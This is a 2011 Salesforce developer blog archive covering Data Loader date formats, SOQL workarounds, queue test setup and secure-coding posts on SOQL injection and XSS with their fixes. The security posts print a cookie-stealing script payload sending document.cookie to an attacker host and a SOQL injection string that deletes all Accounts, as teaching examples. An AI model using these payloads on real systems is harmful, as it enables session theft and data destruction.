
Wednesday 31 August 2011

Date format while uploading data in salesforce

I am back to share my knowledge with the world.
These days I was much involved in data loading, and there I kept making a minor mistake, but each time this minor mistake forced me to re-import.

In the Apex Data Loader settings we have a checkbox, "Use European date format (dd/mm/yyyy)"; setting this checkbox to true allows you to insert dates in dd/mm/yyyy format.

Now maybe you are thinking: what is new here, and what is the need to write a blog post on this, as it looks very common?

Now the picture starts from here:
You have marked the checkbox as true and you are planning to insert the dates in the same format, but by mistake the dates are still in MM/DD/YYYY format in your CSV file.

What will happen now? Any guess?
Will Data Loader insert these records, or is it going to throw an error?
And if the records are inserted, will the date field be populated?

No more questions, otherwise people will leave this topic :P.

So here is the answer:
Data Loader will not throw any error; it will insert a date in the date field, but the date field value will be distorted.

So here is the example:
Suppose I have this setting checked in my Apex Data Loader.
My CSV file has a date field with the value: 01/23/2011 (MM/DD/YYYY)

Now I start the data load operation and the date will be inserted as 01/11/2012.

Explanation: Data Loader is expecting the date in dd/mm/yyyy format while we provided 01/23/2011 (MM/DD/YYYY). 23 cannot be a month value, so 23 is treated as 1 year and 11 months.
So the result will be 01/11/2012.

As you can see, Data Loader is not going to block any record because of this format mismatch, so you have to be very careful with this. It's your responsibility to check the Data Loader setting and the date format in the CSV file.
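The rollover described above, together with a pre-load check for it, as an added example (not from the original post and not Data Loader's code): `lenientDMY` emulates the lenient dd/mm/yyyy behaviour the post observed, and the sample rows are constructed.

```javascript
// Emulates lenient dd/mm/yyyy parsing: an out-of-range month rolls over into
// the following years instead of raising an error. Assumption: this models the
// behaviour the post observed, it is not Data Loader's implementation.
function lenientDMY(text) {
  const [d, m, y] = text.split('/').map(Number);
  const t = new Date(Date.UTC(y, m - 1, d));   // month 23 of 2011 -> Nov 2012
  const pad = (n) => String(n).padStart(2, '0');
  return pad(t.getUTCDate()) + '/' + pad(t.getUTCMonth() + 1) + '/' + t.getUTCFullYear();
}

// Strict check: a real dd/mm/yyyy date survives parse + format unchanged.
function isValidDMY(text) {
  return /^\d{2}\/\d{2}\/\d{4}$/.test(text) && lenientDMY(text) === text;
}

// Audit one CSV date column before loading with the European setting checked.
// Returns the rows that would be silently rewritten, with the value they
// would be loaded as.
function auditDates(values) {
  return values
    .map((value, i) => ({ row: i + 1, value, loadedAs: lenientDMY(value) }))
    .filter((r) => !isValidDMY(r.value));
}

// Constructed sample column; rows 1-3 were exported as MM/DD/YYYY by mistake.
const sample = ['01/23/2011', '03/04/2011', '12/31/2010', '15/02/2011'];

for (const r of auditDates(sample)) {
  console.log('row ' + r.row + ': ' + r.value + ' would load as ' + r.loadedAs);
}
```

Row 2 (03/04/2011) is not flagged: when both fields are 12 or less the mismatch is invisible, so a single flagged row means the whole file needs checking.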

Please correct me if I have got anything wrong here. Comments are welcome.















Saturday 7 May 2011

Salesforce: Play Attachments on the same page

I am back again with a very interesting thing this time.
These days I worked a lot with attachments and realized that if we have any audio/video attachments in the org, then to see them we first need to download them to the local machine, and only then can we play them.

I wanted to build a script which can play an attachment in Salesforce itself without asking for a download.

Now the question is how this is useful:
I had a voice call with a customer and attached this call to the customer record. Now after some days I want to confirm that a point was discussed in the call. So what I need to do is:

  • Go to the customer record.
  • Click on the attachment.
  • Download the attachment.
  • Save on local disk.
  • Play audio.
  • Delete the file once the audio is done, to avoid unnecessary storage use on the machine.

So here you can see that there are 6 steps to listen to an audio file, while we just wanted to hear the discussion again. These steps will always be repeated whenever we want to listen to this conversation.

So if there could be a utility which could play the files in the org itself without asking for a download, that would be better. That's why I started work on this idea, and now here I am.
I have created a Visualforce page and embedded some JS files in it, which allow the audio files to be played on the same screen. It shows a player in the same row as each audio file. Check it here:
http://enable-portal-developer-edition.na8.force.com/apex/PlayMP3?id=00QC000001Oqr4J


This page can be added as an inline Visualforce page on any object which supports attachments.





I have created an unmanaged package for this, so you can modify it as per your requirements.
Here is the URL:
https://login.salesforce.com/?startURL=%2Fpackaging%2FinstallPackage.apexp%3Fp0%3D04tC0000000YZvS

Please comment if any modification can be done to make it better.

Regards,
Bhawani

Friday 15 April 2011

Tricks : Comparing two fields in a SOQL query



Sorry for being inactive for so long :).
Actually these days I am looking into what is not possible in Salesforce and what the workaround for that can be.

So be ready, I am going to post some interesting things in the coming days :).

Are you ready for the first one? So let's start.

I have an object named "Field Comparison" with fields "Start Date" and "End Date".
Now the picture starts from here:
My requirement is to get all the records from "Field Comparison" having End Date greater than Start Date.

So my query should be something like:

List<Field_Comparison__c> listResults = [Select Name from Field_Comparison__c where End_date__c > Start_Date__c];

But unfortunately, due to a Salesforce restriction, we cannot do a field comparison in the where clause. This throws an exception: "Compile Error: line 1, column 98: unexpected token: 'Start_Date__c'".

Then what should be done? Do we need to fetch all the records and filter them in code to get the results?
Absolutely not.

We can create a formula field with the criteria:
IF(End_Date__c > Start_Date__c , 'true', 'false')

Suppose the formula field name is "Is Active". After introducing this field, the records will look like:





I hope you now have the idea of what I am going to do to get only the valid records :D.

So, to get all the valid records, the SOQL query can be:

List<Field_Comparison__c> listResults = [Select Name from Field_Comparison__c where Is_Active__c = 'true'];

Ohh... it's completed. Forgive me for boring you :P.



Please comment to make it more meaningful and more helpful.






Monday 14 March 2011

Salesforce applications with security: SOQL Injection

Hi,

I am here again to share something with you that maybe you already know, but still I would like to rate myself :).
So please be ready for one more boring (I don't think so) topic of mine, "Salesforce applications with security: SOQL Injection".

This time SOQL injection. So SOQL is a type of vaccine for the human body, injected when you really feel weak (Sorry :), no more jokes).

It's a code injection technique that exploits a security vulnerability.
Let me be more specific. Suppose you have a search form and, instead of typing a valid search parameter, the user types some invalid text; that can make your SOQL query invalid and expose unexpected results.
This situation occurs when user input is not filtered for escape characters.
Let's have a pictorial look:



It's a SQL example, but it describes SOQL injection well too.
So here you can see that once the user puts an invalid parameter in the User id field, it goes to the controller and forms a query that results in an invalid login.

The worst scenario could be when the data returned by a query is supposed to be deleted.
Let's have one more quick example of this:

I have a case where I want to delete the Account based on the name entered in the input name field on the page.
The implementation can be like this:

List<Account> listAccount = Database.query('Select id from Account where Name = \'' + nameField + '\' ');

delete listAccount;

It works great with a valid value.
Now it can be at its worst if the value of nameField is provided like:

String nameField = '\' OR Id != null OR Type != \'';


So once the action is performed, this value is bound into the query and the resulting query will be like this:


List<Account> listAccount = Database.query('Select id from Account where Name = \'\' OR Id != null OR Type != \'\' ');

delete listAccount;

So hopefully you can see the monster here. It will delete all the Account records in the database.

Salesforce provides escape functions to get rid of SOQL injection.
The solution can be one of the following:
  1. Try to use STATIC queries as much as possible. A STATIC query has inbuilt escaping.
  2. If a dynamic query is needed, then all the search parameters should go through the escapeSingleQuotes() function, like:
    List<Account> listAccount = Database.query('Select id from Account where Name = \'' + String.escapeSingleQuotes(nameField) + '\' ');
The String.escapeSingleQuotes method adds the escape character (\) to all single quotation marks in a string that is passed in from a user. The method ensures that all single quotation marks are treated as enclosing strings, instead of database commands.
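To see what the escaping changes structurally, here is an added example (not code from the original post, and JavaScript rather than Apex so it runs anywhere). `escapeSingleQuotes` is a stand-in modelling the behaviour described above, and `buildQuery`, `splitSoql` and `isInjected` are hypothetical helper names.

```javascript
// Stand-in for Apex String.escapeSingleQuotes as described in the post: adds a
// backslash before each single quote. Doubling backslashes first is this
// example's own choice (assumption), so a trailing "\" cannot undo the escape.
function escapeSingleQuotes(s) {
  return String(s).replace(/\\/g, '\\\\').replace(/'/g, "\\'");
}

// Same concatenation as the Database.query() call in the post.
function buildQuery(name, escape) {
  const value = escape ? escapeSingleQuotes(name) : name;
  return "Select id from Account where Name = '" + value + "' ";
}

// Split query text into code and string literals, honouring backslash escapes.
// Each literal is replaced by "?" in the code part.
function splitSoql(query) {
  let code = '';
  let current = null;               // null while outside a string literal
  const literals = [];
  for (let i = 0; i < query.length; i++) {
    const ch = query[i];
    if (current === null) {
      if (ch === "'") current = ''; else code += ch;
    } else if (ch === '\\' && i + 1 < query.length) {
      current += query[++i];        // escaped character stays in the literal
    } else if (ch === "'") {
      literals.push(current);
      current = null;
      code += '?';
    } else {
      current += ch;
    }
  }
  return { code: code.trim(), literals, unterminated: current !== null };
}

// The query is intact only if its code part is still the single comparison.
function isInjected(query) {
  const parts = splitSoql(query);
  return parts.unterminated || parts.code !== 'Select id from Account where Name = ?';
}

const payload = "' OR Id != null OR Type != '";   // nameField value from the post
for (const escape of [false, true]) {
  const q = buildQuery(payload, escape);
  console.log(escape ? 'escaped:' : 'raw:', splitSoql(q).code, '| injected =', isInjected(q));
}
```

The same check also flags a legitimate name such as O'Brien when it is concatenated unescaped, which is often how this class of bug is first noticed.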

I hope this post helps you to get a basic understanding of SOQL injection.

Now I am going to finish this, as if I don't, you guys will go to sleep.
So the topic ends, party time ....................



Will be back very soon with something new :).


 




Tuesday 1 March 2011

Salesforce applications with security : Stored XSS

Continuing from my previous post, this time I would like to share my knowledge of Stored XSS.
Stored XSS is cross-site scripting where an attacker can inject his code into the server pages permanently, and these scripts run whenever some action is made on the page.

In other words:
"Stored attacks are those where the injected code is permanently stored on the target servers, such as in a database, in a message forum, visitor log, comment field, etc. The victim then retrieves the malicious script from the server when it requests the stored information."

Let's have an example:
<apex:page standardController="Account">

<script>
function crossXSS()
{
var xssExample = '{!Account.Name}' ;
}
</script>
<apex:form>
<apex:commandLink value="Click me" onClick="crossXSS();" />
</apex:form>
</apex:page>

Now suppose the Account Name is: testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So this account name will always be on the page in the script block, and whenever the commandLink is clicked, "crossXSS" will be called and will run in the following manner:
var xssExample = 'testName';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So again you can see here that all the cookies will be sent to the attacker.com site.

What I suggested in the previous blog post, I am repeating here again :).

To prevent this, Salesforce provides some encoding functions that are available on Visualforce pages, like:
JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE etc.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE(Account.Name)}' ;

So the value fetched from the request parameter will be encoded now.
JSENCODE: To encode the properties in JavaScript.
HTMLENCODE: To encode the properties in HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the properties.
URLENCODE: If building a URL on the page.

Please feel free to ask the questions/doubts. Suggestions are appreciated.














Saturday 26 February 2011

Queue not associated with this SObject type

Recently I ran into a new exception while I was creating a test class for one of my functionalities.
I looked for the solution on the community and other places but couldn't find anything helpful. So I continued on my own.

Here is the case I was looking at:
Create a lead whose owner should be a queue.

I started with this :
Group grp = new Group(Name='Queue',Type='Queue');
insert grp;
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

But when I ran the class, the result was this exception:
System.DmlException: Insert failed. First exception on row 0; first error: INVALID_OPERATION, Queue not associated with this SObject type: []

Here is the solution to get rid of this error:

There is an object named "QueueSobject".
It represents the mapping between a queue Group and the sObject types associated with the queue, including custom objects.

So whenever you want to have a group as the owner of a record, a QueueSobject should be there to map that record's type to the Group.

Like:

Group grp = new Group(Name='Queue',Type='Queue');
insert grp;

QueueSobject mappingObject = new QueueSobject(QueueId = grp.Id, SobjectType = 'Lead');
System.runAs(new User(Id = UserInfo.getUserId())) {
    insert mappingObject;
}
          
Lead lead = new Lead(LastName = 'testLastName',company='test', OwnerId = grp.Id);
insert lead;

So try this whenever you are in the same kind of trouble.

Queries/comments are invited.















Dynamic Mass DML Functionalities

A very interesting thing is that Salesforce provides existing classes for performing Mass DML functionalities, i.e. Mass Edit, Mass Delete, Mass Update etc., with a concrete SObject. That means you should be able to type cast your SObject into a concrete SObject, and then you can perform the Mass DML operations on the result.
We suggest that instead of hard coding the SObject you implement the whole functionality dynamically.
Choose your object, then choose the filter criteria for searching, and then perform the various operations on the search results. Through the Salesforce metadata API you can describe the selected SObject and get all the related fields.
Your selected criteria are then passed to the controller and the search results are displayed on the UI.
Provide a "select all" checkbox, then pass the selected records to the controller. The controller will find out the object name through the key prefix of the selected record ids, and then you can use DML operations to perform any type of action on the records.

Queries are invited.

Saturday 19 February 2011

Salesforce applications with security : Reflected XSS

XSS is also known as cross-site scripting. XSS allows an attacker to inject his code into client script. This is a web application vulnerability which allows an attacker to bypass the sharing rules. By doing this he can also expose sensitive data, session cookies, etc.

Now coming back to reflected XSS: it impacts the page while the page is loading. Suppose I have a block of script and I want to execute a script on page load. This is known as Reflected XSS.

Let's have a close look:
Here is a page; in the script block we are fetching an Id parameter.
<apex:page>
<script>
var xssExample = '{!$CurrentPage.Parameters.id}' ;
</script>
</apex:page>

Now have a deeper look:
The page is called as:
/apex/TestPage?id=idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So when the page is loaded, it will be executed in the following manner:
var xssExample = '{!$CurrentPage.Parameters.id}' ;
Putting in the id value from the request parameter:
var xssExample = 'idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'%2Bdocument.cookie;var%20foo=';

So here you can see that all the cookies will be sent to the attacker.com site.

To prevent this, Salesforce provides some encoding functions that are available on Visualforce pages, like:
JSENCODE, HTMLENCODE, JSINHTMLENCODE, URLENCODE etc.

So the code explained above can be updated as:
var xssExample = '{!JSENCODE($CurrentPage.Parameters.id)}' ;

So the value fetched from the request parameter will be encoded now.
JSENCODE: To encode the properties in JavaScript.
HTMLENCODE: To encode the properties in HTML.
JSINHTMLENCODE: If calling a JavaScript method from an HTML component and passing the properties.
URLENCODE: If building a URL on the page.
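What JavaScript-context encoding buys in both the stored and the reflected case, as an added example (not code from the original posts). `jsEncode` is a stand-in for JSENCODE and an assumption, not Salesforce's implementation; `renderScript`, `isSingleLiteral` and `valueSeenByPage` are hypothetical helper names, and the stored value is constructed.

```javascript
// Stand-in for JSENCODE (assumption: NOT Salesforce's implementation). It
// \u-escapes every character that can end a JavaScript string literal or the
// surrounding <script> block, so the merged value can only ever be data.
function jsEncode(value) {
  return String(value).replace(/[\\'"<>&\r\n\u2028\u2029]/g, (ch) =>
    '\\u' + ch.charCodeAt(0).toString(16).padStart(4, '0'));
}

// What the server emits for:  var xssExample = '{!...}';
function renderScript(value) {
  return "var xssExample = '" + value + "';";
}

// True only when the rendered script is exactly one assignment of one string
// literal, i.e. the merged value did not close the quote early.
function isSingleLiteral(script) {
  return /^var xssExample = '(?:[^'\\\r\n]|\\.)*';$/.test(script);
}

// Run an encoded rendering and return the value the page script would hold.
// Only ever called on encoded output.
function valueSeenByPage(script) {
  return new Function(script + ' return xssExample;')();
}

// Reflected case: the id parameter from the post, URL-decoded as the server sees it.
const reflected = decodeURIComponent(
  "idvalue';1';document.location='http://www.attacker.com/cgi-bin/cookie.cgi?'" +
  "%2Bdocument.cookie;var%20foo='");
// Stored case: a constructed Account Name with an apostrophe and a </script> tag.
const stored = "Acme</script> O'Neil";

function demo() {
  return [reflected, stored].map((v) => ({
    raw: isSingleLiteral(renderScript(v)),                  // false: quote closed early
    encoded: isSingleLiteral(renderScript(jsEncode(v))),    // true: still one literal
    roundTrips: valueSeenByPage(renderScript(jsEncode(v))) === v,
  }));
}
console.log(demo());
```

The round-trip check matters as much as the structural one: the encoded value reaches the script as exactly the original text, so names like O'Neil still display correctly.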

Please feel free to ask the questions/doubts. Suggestions are appreciated.